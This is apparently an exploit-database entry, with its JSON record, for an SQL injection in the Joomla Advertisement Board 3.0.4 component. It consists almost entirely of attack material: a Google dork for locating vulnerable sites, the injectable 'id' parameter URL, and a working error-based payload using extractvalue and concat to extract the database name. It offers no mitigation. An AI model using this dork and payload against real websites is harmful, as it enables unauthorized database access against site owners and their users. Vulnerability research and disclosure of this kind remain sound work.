Search...

Joomla Advertisement Board 3.0.4 Component - id Parameter SQL Injection Vulnerability

2017-03-14T00:00:00

ID 1337DAY-ID-27307
Type zdt
Reporter Ihsan Sencan
Modified 2017-03-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # # # # # 
# Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_advertisementboard
# Date: 14.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/
# Demo: http://ordasvit.com/joomla-adboard/
# Version: 3.0.4
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/153/show_alone_advertisement/7?task=show_alone_advertisement&id=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-
# # # # #

#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"href": "https://0day.today/exploit/description/27307", "history": [], "sourceData": "# # # # # \r\n# Exploit Title: Joomla! Component Advertisement Board v3.0.4 - SQL Injection\r\n# Google Dork: inurl:index.php?option=com_advertisementboard\r\n# Date: 14.03.2017\r\n# Vendor Homepage: http://ordasoft.com/\r\n# Software : https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/advertisement-board/\r\n# Demo: http://ordasvit.com/joomla-adboard/\r\n# Version: 3.0.4\r\n# Tested on: Win7 x64, Kali Linux x64\r\n# # # # # \r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Mail : ihsan[@]ihsan[.]net\r\n# # # # #\r\n# SQL Injection/Exploit :\r\n# http://localhost/[PATH]/index.php/153/show_alone_advertisement/7?task=show_alone_advertisement&id=[SQL]\r\n# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,database())),0)--+-\r\n# # # # #\n\n# 0day.today [2018-03-02] #", "bulletinFamily": "exploit", "modified": "2017-03-14T00:00:00", "title": "Joomla Advertisement Board 3.0.4 Component - id Parameter SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://0day.today/exploit/27307", "cvelist": [], "description": "Exploit for php platform in category web applications", "viewCount": 7, "published": "2017-03-14T00:00:00", "edition": 1, "hash": "6838f1d3c202e8d5754cb2b5109211bffdefc3e1900dd6fa5ce09249afbdc1d1", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "d15bf21f4ed0c51133bdc5d30557d143"}, {"key": "modified", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "published", "hash": "b8d2e9770277e4a8198efeee8a25dfbc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "926b3d7ca013313111b2771fdea67538"}, {"key": "sourceHref", "hash": "1856c3de0a6424a713f10a14e61281f8"}, {"key": "title", "hash": "609e36b284d118d0faa88fb954d6969b"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "id": "1337DAY-ID-27307", "type": "zdt", "lastseen": "2018-03-02T17:35:47", "reporter": "Ihsan Sencan", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-03-02T17:35:47"}, "dependencies": {"references": [], "modified": "2018-03-02T17:35:47"}, "vulnersScore": -0.2}, "objectVersion": "1.3", "references": []}